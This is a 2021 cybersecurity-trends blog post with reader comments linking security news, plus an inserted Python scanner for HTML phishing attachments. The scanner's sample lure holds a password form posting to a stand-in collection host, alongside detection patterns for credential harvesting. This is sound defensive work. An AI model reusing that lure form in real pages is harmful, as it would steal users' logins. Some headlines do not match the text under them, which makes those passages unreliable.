Cyber security trends for 2021

Nothing is more difficult than making predictions. For this reason I did not do any “predictions for 2021 cyber security” post before the year 2021 started. Instead of throwing out wild ideas about what might be coming, I have collected here some trends other people have predicted or reported.

The state of internet security in 2020 was hard. The trends that stormed last year will continue well into 2021: “Rapidly accelerated digital transformations, opportunistic phishing campaigns, discontinuity of information security operations and financial constraints are creating the perfect storm in a COVID-19-disrupted world.” Last year’s trend was that instead of ‘bring your own device’, these days it’s rather ‘bring your own office’.

2020 was a bumper year for cybercriminals, and this boom is expected to continue into 2021. The 2021 Cybersecurity and IT Failures Roundup article presents lessons learned from the many failures, interruptions, crimes and other IT-related setbacks that made the news in 2020. Smart cyber security people have read about them and learned their lesson.

Kaspersky’s top three cybersecurity predictions for 2021 are an increase in targeted attacks, attacks that are more disruptive and exploit contemporary issues, and continued frequent and significant data breaches. I can pretty much agree with those. Cybersecurity must adapt to counter new threats in a transformed world.

Head of Europol’s European Cybercrime Centre: there are no systems that cannot be breached article says that humankind has to choose between evolution by digitization and stagnation. Naturally, the world is moving ahead. “We can’t be naive and expect that bad things will not happen along with it. Resilience is important.”

In 2021 Trend Micro predicts that cybercriminals will look to home networks as a critical launch pad for compromising corporate IT and IoT networks. The New Cybersecurity Threat Predictions for 2021 article points out that the traditional network perimeter has been replaced with multiple edge environments, WAN, multi-cloud, data center, remote worker, IoT, and more, each with its unique risks.

DDoS attacks: Big rise in threats to overload business networks. Cyber attackers are threatening to take organisations offline with DDoS attacks if they aren’t paid bitcoin by a deadline – but victims are being urged not to give in to demands.

One sure bet is that ransomware attacks will only escalate further over this year. Pay-or-Get-Breached Ransomware Schemes Take Off in 2021. In 2020, ransomware attackers moved quickly to adopt so-called “double extortion” schemes: first they encrypt your data so you can’t access it, and then they threaten to publish your most secret data for other people to see if you don’t pay up. Ransomware victims that have backups are paying ransoms to stop hackers leaking their stolen data.

Modern cybercrime is becoming increasingly open-sourced, which means that some of the most sophisticated and notorious cybercriminals are already using open-source tools to conduct their criminal activities, and this will increase.

Trend Micro survey results claim that AI is set to replace humans in cybersecurity by 2030. I am just wondering what this claim means and whether the people who answered the survey have really understood AI and cyber security. My prediction is that we will need humans, AI and even traditional solutions for a long, long time.

The lack of people with cyber security skills is still a problem for many companies, because AI will not replace them any time soon. There are different views on how the situation has developed. The Cybersecurity Skills Shortage Falls for First Time article claims that the shortfall in skills has dropped from 4.07 million last year to 3.12 million. The As The End Of 2020 Approaches, The Cybersecurity Talent Drought Gets Worse article says that the information technology industry has a real problem on its hands – and it’s only getting worse. While cybercrime grows exponentially, businesses are facing a severe cybersecurity talent drought. The supply of available, qualified security professionals is insufficient and the competition for their services has dramatically increased. Some companies claim to have invented a “silver bullet” for educating cyber professionals, like the article This educator claims to have invented an entertaining way to learn cybersecurity. Some of the cyber security issues are moving to the cloud, so we need more people who know both security and cloud: The Cloud Talent Drought Continues (And Is Even Larger Than You Thought).

The Hackers leverage sophisticated and novel techniques to break into networks article tells that the recent SolarWinds and JetBrains attacks are prime examples of why state-sponsored attacks are so dangerous. The hackers leveraged sophisticated, novel techniques to break into networks and obtain backdoor access to government agencies and enterprises. Expect to see more break-ins connected to those incidents, and expect more similar incidents that have not yet been revealed.

Want to avoid having your online accounts hacked? Enable two-factor authentication. Better than the best password: How to use 2FA to improve your security article tells that this is a crucial security measure that requires an extra step when signing in to high-value services. The article explains how to set up 2FA and which accounts to focus on first.

A new version of OWASP Top-10 is coming this year. The OWASP Top-10 2021 Statistics-based proposal article tries to make OWASP Top-10 2021 predictions calculated from understandable metrics, make everyone able to reproduce the results, and present them to the entire community for feedback.

The Privacy is an illusion. But that’s a good thing article says that everyone’s information is available. It doesn’t matter who you are. Some people would pay lots of money to get that privacy illusion back and some just don’t care. The With the Death of Cash, Privacy Faces a Deeply Uncertain Future article says that in one future we have a private, anonymous alternative to cash, but in the Black Mirror future the money in your pocket knows everything about you. Cash is dying, that’s for sure. There are still ways to send anonymous emails, and it is a good idea to prepare for your digital life after death.

The Ransomware attacks will explode in 2021 article claims that the Capitol riot and its aftermath make the case for tech regulation more urgent, but no simpler. Against increased regulation there are freedom-of-speech issues, such as: Should Jack Dorsey be able to silence the president of the United States? Whether the storming of the US Capitol was an attempted coup, an insurrection, or an assault on democracy is merely a question of semantics. The US is now the focus of global instability. EU chief warns over ‘unfiltered’ hate speech and calls for Biden to back rules for big tech.

The Legal requirements for IoT security start to emerge article tells that legislative activities are starting to make security a legal requirement: consumer IoT designs must have vaguely defined “reasonable security features”. The US government is beginning to create legislation mandating IoT security. The US House of Representatives, for instance, introduced H.R. 1668 – The Internet of Things Cybersecurity Improvement Act of 2020. There are NIST recommendations such as NISTIR 8259 — Foundational Cybersecurity Activities for IoT Device Manufacturers. The EU introduces a cyber security IoT standard to protect its citizens, and ENISA Publishes Guidelines on Securing the IoT Supply Chain.

7 Cybersecurity Predictions for Smart Buildings and Infrastructure for 2021: Continuous patch management and security updates, OT transparency for IT stakeholders, Natively secure OT network, Cloud-based access to remote sites instead of VPN, Zero touch onboarding, More cybersecurity in small facilities, Certified cybersecurity products and solutions.

IoT security is still complicated. For many development teams, the idea of building cybersecurity into their IoT design can seem daunting. 6 essential activities to help developers build in IoT cybersecurity article gives some ideas to improve cyber security in your IoT development.

2,204 Comments

  1. Tomi Engdahl says:

    Fools Gold: Questionable Vaccines, Bogus Results, and Forged Cards https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fools-gold-questionable-vaccines-bogus-results-and-forged-cards/
    In addition to selling COVID-19 vaccines, vaccination cards, and fake test results, cybercriminals can also benefit by reselling the names, dates of birth, home addresses, contact details, and other personally identifiable information of their customers.

    Reply
  2. Tomi Engdahl says:

    CIS Controls Version 8
    https://www.cisecurity.org/controls/v8/
    CIS Controls v8 has been enhanced to keep up with modern systems and software. Movement to cloud-based computing, virtualization, mobility, outsourcing, Work-from-Home, and changing attacker tactics prompted the update and supports an enterprise’s security as they move to both fully cloud and hybrid environments.

    Reply
  3. Tomi Engdahl says:

    Israel bombed two Hamas cyber targets
    https://therecord.media/israel-bombed-two-hamas-cyber-targets/
    According to the official Israel Air Force Twitter account, the first strike hit a cyber-equipment storage site in the northern Gaza Strip belonging to Hamas military intelligence that was apparently being used as an impromptu data center.

    Reply
  4. Tomi Engdahl says:

    https://therecord.media/solarwinds-ceo-apologizes-for-blaming-an-intern-says-attack-may-have-started-in-january-2019/
    On the topic of the breach itself, [CEO] Ramakrishna also gave additional details about the timeline of the attack. The group behind the compromise, which the U.S. government has attributed to Russia’s foreign intelligence service, “may have been in our environment as early as January 2019 doing very early recon activities,” Ramakrishna said.
    The company has said that it believed hackers initially accessed SolarWinds systems as early as September 2019.

    Reply
  5. Tomi Engdahl says:

    And they only want 10years experience and a masters.

    U.S. has almost 500,000 job openings in cybersecurity
    https://www.cbsnews.com/news/cybersecurity-job-openings-500k/

    Help wanted: thousands and thousands of people interested in a career in cybersecurity.

    There are about 465,000 open positions in cybersecurity nationwide as of May 2021, according to Cyber Seek — a tech job-tracking database from the U.S. Commerce Department — and the trade group CompTIA.

    The need for more web watchmen spans from private businesses to government agencies, experts say, and most of the job openings are in California, Florida, Texas and Virginia. That means for anyone looking to switch careers and considering a job in cybersecurity, there’s no greater time than now to find work, the job trackers said.

    Reply
  6. Tomi Engdahl says:

    The Pfizer-BioNTech vaccine is a top target of conspiracy theories
    https://www.cbsnews.com/news/covid-vaccine-pfizer-conspiracy-theories/

    The Pfizer-BioNTech coronavirus vaccine became a target of conspiracy theories and disinformation campaigns as soon as it was announced, reaching millions of people on sites like Twitter, Reddit and 4chan, according to a recent analysis from a cyber defense firm.

    COVID-19 conspiracy narratives, like the false belief that the vaccine was delayed for political reasons, flourished on social networks in the fall and early winter, according to the New York tech security firm Blackbird.

    These bogus notions about the vaccines, amplified by a relatively small number of fake accounts and real influencers, reached millions of people, Khaled said.

    “Bots and influencers work in tandem,” he explained. “We can’t prove if they collude behind the scenes, but social media data shows clearly that they influence each other by sharing the same links, repeating the same phrases, tagging the same accounts and jumping in on trending hashtags.”

    For example, some botnets reach real influencers by spamming conspiracy links to trending hashtags. Another common tactic is to generate fake trends by synchronizing hundreds of posts using similar anti-vaccine and pseudoscientific claims.

    One common tactic is to co-opt trending topics by spamming content with provocative rhetoric that is intended to encourage engagement. This helps raise the visibility and reach of a piece of content, which increases the likelihood that a politically aligned influencer will further share the content. The content gains momentum by muddying the waters between facts and falsehoods.

    Reply
  7. Tomi Engdahl says:

    China could soon have stronger privacy laws than the U.S.
    https://www.protocol.com/china/china-privacy-laws-surpass-usa
    In late April, China unveiled the second draft of the country’s privacy law, the Personal Information Protection Law, for public comment. The law is expected to pass by the end of the year, and would shield Chinese internet users from excessive data collection and misuse of personal data by tech companies and even, to some extent, by the government.

    Reply
  8. Tomi Engdahl says:

    The Full Story of the Stunning RSA Hack Can Finally Be Told https://www.wired.com/story/the-full-story-of-the-stunning-rsa-hack-can-finally-be-told/
    In 2011, Chinese spies stole the crown jewels of cybersecurity, stripping protections from firms and government agencies worldwide. Here’s how it happened.

    Reply
  9. Tomi Engdahl says:

    Hetzner cloud server provider bans cryptocurrency mining https://www.bleepingcomputer.com/news/cryptocurrency/hetzner-cloud-server-provider-bans-cryptocurrency-mining/
    “With storage boxes this leads to problems with the bandwidth on the host systems. With chia mining there is also the problem that the hard drives are extremely stressed by the many read and write processes and will therefore break.”

    Reply
  10. Tomi Engdahl says:

    Craig Federighi says the Mac has an unacceptable malware problem https://9to5mac.com/2021/05/19/craig-federighi-mac-malware-problem/
    As detailed earlier this afternoon, Craig Federighi is currently testifying during the Apple vs. Epic lawsuit. While facing questioning from Apple’s lawyers, Federighi made some interesting comments about security, particularly noting that the Mac currently has a level of malware that Apple does not find acceptable.

    Reply
  11. Tomi Engdahl says:

    Look how many cybercriminals love Cobalt Strike http://www.intel471.com/blog/cobalt-strike-cybercriminals-trickbot-qbot-hancitor
    Despite the obfuscation techniques, Intel 471 has collected a wealth of information on how the cybercrime underground has refashioned this security tool to its advantage. The following takes a deeper look at which threat actor groups and malware families are dropping Cobalt Strike for post-exploitation.

    Reply
  12. Tomi Engdahl says:

    DHS announces program to mitigate vulnerabilities below the operating system https://www.scmagazine.com/home/security-news/vulnerabilities/dhs-announces-program-to-mitigate-vulnerabilities-below-the-operating-system/
    Officials from the Cybersecurity and Infrastructure Security Agency announced a new initiative to fight firmware vulnerabilities at the RSA Conference Wednesday afternoon. “In cybersecurity, we spend the majority of our time observing, analyzing, and responding to vulnerabilities in operating systems, and at the application layer,” said Rohner. “And yet, there are categories of vulnerabilities lurking beneath the proverbial surface that we aren’t dealing with through our vulnerability research efforts and our incident response activities.”

    Reply
  13. Tomi Engdahl says:

    https://go.recordedfuture.com/hubfs/cta-2021-0520.pdf
    The sharing of information, tools, and manuals by threat actors on dark web forums allows fraudsters to learn tips and tricks from one another and to continue to refine their techniques to successfully engage with victims. This also lowers the barrier of entry so that even novice threat actors can successfully participate in dating fraud.

    Reply
  14. Tomi Engdahl says:

    SimuLand: Understand adversary tradecraft and improve detection strategies https://www.microsoft.com/security/blog/2021/05/20/simuland-understand-adversary-tradecraft-and-improve-detection-strategies/
    SimuLand is an open-source initiative by Microsoft to help security researchers around the world deploy lab environments that reproduce well-known techniques used in real attack scenarios, actively test and verify the effectiveness of related Microsoft 365 Defender, Azure Defender, and Azure Sentinel detections, and extend threat research using telemetry and forensic artifacts generated after each simulation exercise.

    Reply
  15. Tomi Engdahl says:

    Traficom defined the critical network elements – also for 4G and 5G networks
    https://www.uusiteknologia.fi/2021/05/21/traficom-maaritteli-kriittiset-verkkoelementit-myos-4g-ja-5g-verkkojen-osalta/

    The Finnish Transport and Communications Agency Traficom has defined the critical parts of communications networks more precisely than before, reports the Tietoturva Nyt site. The critical parts are defined in a technology-neutral way, but they have been supplemented for 4G and 5G networks. Although Huawei is not mentioned by name, the American suspicions about the use of the Chinese manufacturer’s 5G technology probably also influenced the definitions.

    Background: According to section 244 a of the Act on Electronic Communications Services (917/2014) currently in force, i.e. the Communications Services Act, a communications network device may not be used in the critical parts of a public communications network if there are weighty grounds to suspect that using the device would endanger national security or national defence. This ban on use covers situations in which the use would enable foreign intelligence activity or activity that would disrupt, paralyse or otherwise harmfully affect Finland’s important interests, the basic functions of society or the democratic social order. The section entered into force at the start of 2021.

    https://www.kyberturvallisuuskeskus.fi/fi/ajankohtaista/traficom-maarittelee-viestintaverkon-kriittiset-osat
    https://www.traficom.fi/fi/saadokset?group=kyberturvallisuus&limit=20&offset=0&query=&sort=created&toggle=M%C3%A4%C3%A4r%C3%A4ys%20viestint%C3%A4verkon%20kriittisist%C3%A4%20osista

    Reply
  16. Tomi Engdahl says:

    Amazon’s Ring is the largest civilian surveillance network the US has ever seen
    Lauren Bridges
    https://www.theguardian.com/commentisfree/2021/may/18/amazon-ring-largest-civilian-surveillance-network-us

    One in 10 US police departments can now access videos from millions of privately owned home security cameras without a warrant

    In a 2020 letter to management, Max Eliaser, an Amazon software engineer, said Ring is “simply not compatible with a free society”. We should take his claim seriously.

    Ring video doorbells, Amazon’s signature home security product, pose a serious threat to a free and democratic society. Not only is Ring’s surveillance network spreading rapidly, it is extending the reach of law enforcement into private property and expanding the surveillance of everyday life. What’s more, once Ring users agree to release video content to law enforcement, there is no way to revoke access and few limitations on how that content can be used, stored, and with whom it can be shared.

    Ring is effectively building the largest corporate-owned, civilian-installed surveillance network that the US has ever seen. An estimated 400,000 Ring devices were sold in December 2019 alone, and that was before the across-the-board boom in online retail sales during the pandemic. Amazon is cagey about how many Ring cameras are active at any one point in time, but estimates drawn from Amazon’s sales data place yearly sales in the hundreds of millions.

    Then there’s this: since Amazon bought Ring in 2018, it has brokered more than 1,800 partnerships with local law enforcement agencies, who can request recorded video content from Ring users without a warrant. That is, in as little as three years, Ring connected around one in 10 police departments across the US with the ability to access recorded content from millions of privately owned home security cameras. These partnerships are growing at an alarming rate.

    In the past year, through the end of April 2021, law enforcement has placed more than 22,000 individual requests to access content captured and recorded on Ring cameras.

    Ring’s pervasive network of cameras expands the dragnet of everyday pre-emptive surveillance – a dragnet that surveils anyone who passes into its gaze, whether a suspect in a crime or not. Although the dragnet indiscriminately captures everyone, including children, there are obvious racial, gendered and class-based inequities when it comes to who is targeted and labelled as “out of place” in residential space.

    Reply
  17. Tomi Engdahl says:

    ‘You Can’t Just Concede.’ How One Expert Explains Negotiating With Cybercriminals
    https://www.npr.org/2021/05/18/997549334/you-cant-just-concede-how-one-expert-explains-negotiating-with-cybercriminals

    Thousands of institutions fall victim to ransomware attacks each year in the U.S., including local governments, small businesses, schools, hospitals, airports and more. Law enforcement discourages paying the extortionists, but many businesses do. Surveys suggest at least a quarter of victims pay up, with payments often in the tens or even hundreds of thousands of dollars.

    Data is spotty, though, because many companies don’t report attacks. And even if they pay, there’s no guarantee they’ll recover all their data.

    So when businesses are attacked with ransomware, one of the people they call is Bill Siegel, CEO of Coveware. The company collects data on ransomware attacks, helps victims respond to attacks and often negotiates with hackers.

    “It’s not a foregone conclusion that a company has to pay a ransom,” he says. Large companies may need days to figure out whether their data is safely backed up. They can start talking just to buy time. “We’ll kick off negotiation, knowing that a very likely outcome is that we actually don’t end up paying.”

    Reply
  18. Tomi Engdahl says:

    This is how scammers FORGE! BEWARE OF THIS INCREASINGLY COMMON SCAM!
    https://www.youtube.com/watch?v=1z8o_E_eWRg

    In this video I show in practice how scammers are currently scamming! Receipt forgeries and sleight-of-hand tricks in online banking. These are impossible to notice!

    Reply
  19. Tomi Engdahl says:

    Growing Mystery of Suspected Energy Attacks Draws US Concern
    https://www.securityweek.com/growing-mystery-suspected-energy-attacks-draws-us-concern

    The Biden administration is facing new pressure to resolve a mystery that has vexed its predecessors: Is an adversary using a microwave or radio wave weapon to attack the brains of U.S. diplomats, spies and military personnel?

    The number of reported cases of possible attack is sharply growing and lawmakers from both parties, as well as those believed to be affected, are demanding answers. But scientists and government officials aren’t yet certain about who might have been behind any attacks, if the symptoms could have been caused inadvertently by surveillance equipment — or if the incidents were actually attacks.

    Whatever an official review concludes could have enormous consequences. Confirmation that a U.S. adversary has been conducting damaging attacks against U.S. personnel would unleash calls for a forceful response by the United States.

    Reply
  20. Tomi Engdahl says:

    Microsoft Unveils SimuLand: Open Source Attack Techniques Simulator
    https://www.securityweek.com/microsoft-unveils-simuland-open-source-attack-techniques-simulator

    Microsoft this week announced the availability of SimuLand, an open source tool that enables security researchers to reproduce attack techniques in lab environments.

    The purpose of SimuLand, Microsoft says, is to help understand the behavior and functionality of threat actors’ tradecraft, to find mitigations and validate existing detection capabilities, and to identify and share data sources relevant to adversary detection.

    SimuLand can be used to test the effectiveness of Microsoft 365 Defender, Azure Defender, and Azure Sentinel detections.

    Furthermore, it is expected to help accelerate the building and deployment of threat research lab environments and to enable security researchers to stay up to date with the techniques and tools that threat actors employ in real-world attacks.

    “Our goal is to have SimuLand integrated with threat research methodologies where dynamic analysis is applied to end-to-end simulation scenarios,” Microsoft says.

    Based on open-source projects such as Azure Sentinel2Go and the Open Threat Research (OTR) community’s Blacksmith and featuring a modular design, SimuLand can be used to test various combinations of attack actions and also includes guides for lab deployment and for executing simulation exercises.

    https://github.com/Azure/SimuLand

    Reply
  21. Tomi Engdahl says:

    Lessons Learned From High-Profile Exploits
    https://www.securityweek.com/lessons-learned-high-profile-exploits

    In 2020, malicious actors took full advantage of the expanded threat landscape created by the increase in remote work. We saw the reappearance of older malware targeting older, unpatched devices in home networks, a seven-fold increase in ransomware attacks, and one of the most significant supply chain hacks in recent years. And so far, 2021 is following that theme with the recent attempts by cyber adversaries using a variety of attacks to exploit several Microsoft Exchange Server vulnerabilities and a continued assault with ransomware.

    Given the rapid expansion of the potential attack surface, the interconnection of devices and data across a larger digital environment, and the inconsistent and fragmented approach to security taken by many organizations, cybersecurity risk has never been greater. As the saying goes, there’s no rest for the weary—and the recent spate of ransomware and other attacks looking to exploit newly revealed critical system vulnerabilities are just the latest in an escalating campaign by increasingly motivated and sophisticated criminals. And that means cybersecurity professionals have to stay vigilant and prepared.

    Reply
  22. Tomi Engdahl says:

    A Renewed Push to Improve the Nation’s Cybersecurity
    https://www.securityweek.com/renewed-push-improve-nations-cybersecurity

    Biden’s Executive Order to improve the nation’s cybersecurity is a good first step, but it is unlikely to materially change the defensive posture of the nation

    In response to recent cybersecurity incidents such as SolarWinds, Microsoft Exchange, and the Colonial Pipeline ransomware attack, President Biden on May 12, 2021 signed an Executive Order (EO) to improve the nation’s cybersecurity and protect federal government networks. For close observers, this seems to be like Groundhog Day, as past incoming administrations have issued similar executive orders to address insufficient cybersecurity defenses that leave public and private sector entities vulnerable to attacks. The National Institute of Standards and Technology (NIST) Cybersecurity Framework and the Department of Homeland Security’s Continuous Diagnostic and Mitigation (CDM) Program are good examples of past attempts to strengthen the federal government’s security posture and improve cyber resilience. The big question is whether the proposed actions in this new EO are attainable.

    Reply
  23. Tomi Engdahl says:

    Android 12 will give you more control over how much data you share with apps https://android-developers.googleblog.com/2021/05/android-security-and-privacy-recap.html
    New Android release will give users more transparency around the data being accessed by apps. Android is also investing in reducing the scope of permissions so that apps only have access to the data they need for the features they provide. Let’s look at some of these important changes we’ve made in Android 12 to protect user privacy.

    Reply
  24. Tomi Engdahl says:

    Crypto-mining gangs are abusing the free tiers of cloud computing platforms https://therecord.media/crypto-mining-gangs-are-running-amok-on-free-cloud-computing-platforms/
    Gangs have been operating by registering accounts on selected platforms, signing up for a free tier, and running a cryptocurrency mining app on the provider’s free tier infrastructure.

    Reply
  25. Tomi Engdahl says:

    Privacy in the time after cookies – Google Chrome’s new FLoC tracking https://www.forbes.com/sites/zakdoffman/2021/05/01/stop-using-google-chrome-on-your-iphone-android-macbook-and-pc/
    Now that the third-party cookie era is coming to an end, other tracking methods are being experimented with. Zak Doffman discusses in detail what kind of privacy impact Chrome’s new FLoC tracking has.

    Reply
  26. Tomi Engdahl says:

    Serverless Phishing Campaign
    https://isc.sans.edu/diary/%22Serverless%22+Phishing+Campaign/27446
    Usually most attackers deploy their phishing kits on servers; this one includes an obfuscated HTML phishing page attached to the mail. Xavier Mertens, Senior ISC Handler, analyses the method in the InfoSec Handlers diary blog.

    Reply
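The “serverless” technique in the comment above (the phishing page travels as an HTML attachment instead of being hosted) is a case a mail gateway or SOC triage script can catch before the user opens it. The Python below is an added example written for this page, not code from the ISC diary or from Xavier Mertens: it parses an RFC 822 message with the standard library, picks out HTML attachments, and scores each against a few obfuscation and credential-harvesting indicators such as `unescape(` / `atob(` decoders, `document.write(`, a password field and a form posting to a remote host. The sample mail, the indicator names, the `example.invalid` addresses and the scoring threshold are all constructed for the demonstration; on real traffic the indicator list is a starting point and a high score is a triage signal, not a verdict.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage
from typing import Dict, List

# Heuristic markers seen in HTML phishing attachments. Each one is harmless on
# its own; the score counts how many co-occur in the same attachment.
INDICATORS: Dict[str, "re.Pattern"] = {
    "unescape_call": re.compile(r"\bunescape\s*\(", re.I),
    "atob_call": re.compile(r"\batob\s*\(", re.I),
    "eval_call": re.compile(r"\beval\s*\(", re.I),
    "from_char_code": re.compile(r"fromCharCode", re.I),
    "document_write": re.compile(r"document\.write\s*\(", re.I),
    "long_base64_blob": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
    "password_field": re.compile(r"<input[^>]+type\s*=\s*['\"]?password", re.I),
    "remote_form_action": re.compile(r"<form[^>]+action\s*=\s*['\"]?https?://", re.I),
}

HTML_SUFFIXES = (".htm", ".html", ".shtml", ".xhtml")


def is_html_attachment(part: EmailMessage) -> bool:
    """HTML by declared type, or by filename when the sender mislabels the type."""
    filename = (part.get_filename() or "").lower()
    return part.get_content_type() == "text/html" or filename.endswith(HTML_SUFFIXES)


def scan_message(raw: bytes) -> List[dict]:
    """Return one finding per HTML attachment: filename, size, indicators hit, score."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        if not is_html_attachment(part):
            continue
        payload = part.get_payload(decode=True) or b""  # undoes base64 / quoted-printable
        text = payload.decode("utf-8", errors="replace")
        hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
        findings.append({
            "filename": part.get_filename(),
            "bytes": len(payload),
            "indicators": hits,
            "score": len(hits),
        })
    return findings


def verdict(findings: List[dict], threshold: int = 2) -> str:
    """Constructed policy: two or more indicators in one attachment is enough to quarantine."""
    return "suspicious" if any(f["score"] >= threshold for f in findings) else "clean"


def build_sample_message() -> bytes:
    """Constructed test mail (not a real capture): one lure-like HTML attachment,
    one plain HTML report and one non-HTML attachment that must be skipped."""
    msg = EmailMessage()
    msg["From"] = "billing@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Invoice attached"
    msg.set_content("Please open the attached invoice.")
    lure = (
        '<html><body>'
        '<script>document.write(unescape("%3Ch1%3EPlease%20sign%20in%3C%2Fh1%3E"));</script>'
        '<form action="https://login.example.invalid/collect">'
        '<input type="text" name="user"><input type="password" name="pw"></form>'
        '</body></html>'
    )
    msg.add_attachment(lure, subtype="html", filename="invoice.html")
    msg.add_attachment("<html><body><p>Quarterly report</p></body></html>",
                       subtype="html", filename="report.html")
    msg.add_attachment(b"%PDF-1.4 constructed placeholder", maintype="application",
                       subtype="pdf", filename="terms.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    results = scan_message(build_sample_message())
    for f in results:
        print(f"{f['filename']}: score={f['score']} indicators={f['indicators']}")
    print("verdict:", verdict(results))
```

Decoding with `get_payload(decode=True)` matters: the attachment arrives base64- or quoted-printable-encoded, so pattern matching on the raw message body would miss every indicator. Filename-based detection is kept alongside the declared content type because attackers control both headers.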
  27. Tomi Engdahl says:

    PowerShell Is Source of More Than a Third of Critical Security Threats https://www.esecurityplanet.com/threats/powershell-source-of-third-of-critical-security-threats/
    PowerShell was the source of more than a third of critical threats detected on endpoints in the second half of 2020, according to a Cisco research study released at the RSA Conference.

    Reply
  28. Tomi Engdahl says:

    Belgium approves new cyber strategy with emphasis on essential institutions https://therecord.media/belgium-approves-new-cyber-strategy-with-emphasis-on-essential-institutions/
    After Belgium’s parliament, universities, and scientific institutions were hit by a cyberattack, a new cybersecurity strategy has been approved. Six strategic areas they are focusing on are: investing in secure network infrastructure; raising awareness of cybersecurity threats; protecting vital institutions; deterring cyberattacks; improving public, private, and academic partnerships; and articulating a clear international commitment to the issue.

    Reply
  29. Tomi Engdahl says:

    Everything you ever wanted to know about DNS and more!
    https://isc.sans.edu/forums/diary/New+YouTube+Video+Series+Everything+you+ever+wanted+to+know+about+DNS+and+more/27440/
    It’s not DNS. There’s no way it’s DNS. It was DNS. A new video series from SANS ISC describes the inner workings of DNS and walks you through some of the DNS problems.

    Reply
  30. Tomi Engdahl says:

    Cyber Insurance Is Not a Substitute for Cybersecurity https://www.crowdstrike.com/blog/why-cyber-insurance-is-not-a-substitute-for-cybersecurity/
    Attacks are increasing in frequency, ransom demands are rising and the cyber insurance industry has reached a crossroads where cyber insurance cannot be used by victims of a ransomware attack as a substitute for inadequate cybersecurity solutions and practices.

    Reply
  31. Tomi Engdahl says:

    Subscription ransomware – Zeppelin ransomware comes back to life https://www.bleepingcomputer.com/news/security/zeppelin-ransomware-comes-back-to-life-with-updated-versions/
    The developers of Zeppelin ransomware have resumed their activity after a period of relative silence that started last fall and have started to advertise new versions of the malware. The earning model of the ransomware is a bit more interesting, in that it includes providing a cut to the developers and a subscription model for regular customers.
  32. Tomi Engdahl says:

    VPN Android apps: What you should know
    https://newsblur.com/site/6289490/malwarebytes-labs
    In just the past year, free VPN for Android apps have exposed the data of as many as 41 million users. Investigations into one of those free VPN Android apps also revealed that it may have been part of a larger web of Android VPNs all operating under the same company.
  33. Tomi Engdahl says:

    Key Takeaway from the Colonial Pipeline Attack https://blogs.cisco.com/security/key-takeaway-from-the-colonial-pipeline-attack
    In the Cisco Blog, Vikram Sharma describes the Colonial Pipeline attack and some measures that could have helped prevent the attack.
  34. Tomi Engdahl says:

    Hack, Disinform, Deny: Russia’s Cybersecurity Strategy
    https://www.securityweek.com/hack-disinform-deny-russias-cybersecurity-strategy

    Over the years, Moscow has faced numerous allegations of cyberattacks that resulted in multiple sanctions and the expulsion of its diplomats. The term “hacker” has almost become synonymous with Russia.

    From “troll factories” to hackers allegedly controlled by the country’s security services, here is an overview of the world of Russian cybercrimes.
  35. Tomi Engdahl says:

    Uncovering Shenanigans in an IP Address Block via Hurricane Electric’s BGP Toolkit
    https://isc.sans.edu/diary/rss/27456
    InfoSec Handler’s tip from Yee Ching Tok on using the excellent HE BGP Toolkit on networks to find malicious phishing sites.
  36. Tomi Engdahl says:

    The Rise of Continuous Attack Surface Management
    https://www.securityweek.com/rise-continuous-attack-surface-management

    In the merry-go-round world of InfoSec technologies and “what’s old is new again,” this year we should include Attack Surface Management with a dash of Continuous.

    Twenty years ago, the first commercial “ethical hacking” training courses taught defenders the mystic arts and methodologies of targeted intrusion. Back then, a lengthy opening chapter would cover the ethics of hacking and the legal consequences of employing the skills students were about to learn. It wasn’t until chapter two that students got to roll up their sleeves and learn through doing — beginning with passive information gathering and enumerating the attack surface of a target (typically the student’s own employer).

    Any technical CISO and greying SecOps professional worth their salt can recollect their first ethical hacking experience and foray into mapping the attack surface of their business and being both excited and shocked at the long list of security-related findings they had uncovered with their own hands.

    Two decades later, as businesses expand upon their digital transformation investments, their internet-exposed surface has grown exponentially and with it so too have the vectors for attack. In an increasingly cloudified world, identifying what business systems are publicly accessible and what confidential insights or vulnerabilities they may expose has risen to critical importance. Ad hoc point-in-time enumerations of an organization’s external attack surface are being superseded by continuous attack surface management (CASM).

    Although CASM is a new label, there’s already a mix of several dozen old and new startup companies focused on external attack surface enumeration and public asset attribution — with an array of integration options into existing threat intelligence platforms (TIP), vulnerability assessment management (VAM) systems, cloud security posture management (CSPM) and SIEM solutions. Although diverse in their offerings, vendors can be roughly divided into three value propositions:

    1. “Traditional” external attack security enumerators that focus on cyclically mapping and inventorying the entire internet, often with limited attribution or asset ownership insights. Their data tends to be most useful and consumable from a TIP perspective.

    2. Digital Risk Protection services that fuse attack surface information with other intelligence sources (e.g., dark web monitoring) to provide customers with enterprise risk insights. Often delivered as part of brand protection and fraud campaign detection services.

    3. Continuous automated external testing of an enterprise’s (known) assets for an outside-in and attacker’s perspective for the prioritization of vulnerability and asset remediation (often as part of VAM).
  37. Tomi Engdahl says:

    Report Highlights Massive Scale of Automated Cyberattacks
    https://www.securityweek.com/report-highlights-massive-scale-automated-cyberattacks

    Gartner first gave name to the Secure Access Service Edge (SASE) model, effectively defining it. SASE combines WAN and security as a cloud service.

    In 2019, Gartner wrote, “SASE is a new package of technologies including SD-WAN, SWG, CASB, ZTNA and FWaaS as core abilities, with the ability to identify sensitive data or malware and the ability to decrypt content at line speed, with continuous monitoring of sessions for risk and trust levels.”

    Since that time, major security firms have been developing or acquiring SASE capabilities to build into their own platforms, leaving Cato Networks as one of the first and few pure SASE firms.

    On March 25, 2021, Gartner wrote, “By 2025, at least 60% of enterprises will have explicit strategies and timelines for SASE adoption encompassing user, branch and edge access, up from 10% in 2020.”
  38. Tomi Engdahl says:

    Gartner: Global Security Spending Will Reach $150 Billion in 2021
    https://www.securityweek.com/gartner-global-security-spending-will-reach-150-billion-2021

    Research and advisory giant Gartner predicts that global security and risk management spending will exceed $150 billion this year.

    The company forecasts that information security and risk management will grow by more than 12 percent in 2021. Spending in these segments increased by more than 6 percent in 2020.

    Gartner says nearly half of the total, roughly $72 billion, will be spent on security services, including consulting, hardware support, and implementation and outsourced services. Significant amounts of money will also be invested in infrastructure protection ($24 billion), network security equipment ($17 billion), and identity access management ($14 billion).

    The company believes less than a billion will be spent on cloud security, which it described as the “smallest but fastest growing market segment.”
